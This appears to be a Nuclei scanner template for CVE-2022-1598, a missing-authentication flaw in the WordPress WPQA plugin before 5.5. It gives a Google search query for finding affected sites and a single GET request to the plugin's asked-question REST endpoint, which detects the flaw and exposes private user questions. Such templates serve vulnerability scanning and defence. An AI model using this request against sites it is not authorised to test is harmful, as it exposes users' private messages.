id: CVE-2022-1598 info: name: WordPress WPQA <5.5 - Improper Access Control author: veshraj severity: medium description: | WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site. impact: | This vulnerability can result in unauthorized access to sensitive information, potentially leading to data breaches or unauthorized actions. remediation: | Update the WPQA plugin to version 5.5 or later to fix the improper access control issue. reference: - https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598 - https://nvd.nist.gov/vuln/detail/CVE-2022-1598 - https://github.com/20142995/Goby - https://github.com/WhooAmii/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-1598 cwe-id: CWE-306 epss-score: 0.01171 epss-percentile: 0.84672 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: 2code product: wpqa_builder framework: wordpress google-query: inurl:/wp-content/plugins/wpqa tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan,2code http: - method: GET path: - '{{BaseURL}}/wp-json/wp/v2/asked-question' matchers-condition: and matchers: - type: word part: body words: - '"id":' - '"rendered":' condition: and - type: status status: - 200 # digest: 490a00463044022021b93d9ab57892fc1d94341d94f4826d6854e08a0fa9bce7672de506ae876a77022068edb87c27a2607cd497f6ca61cef522833220ba5ab8d5fba938d004f8ffa662:922c64590222798bb761d5b6d8e72950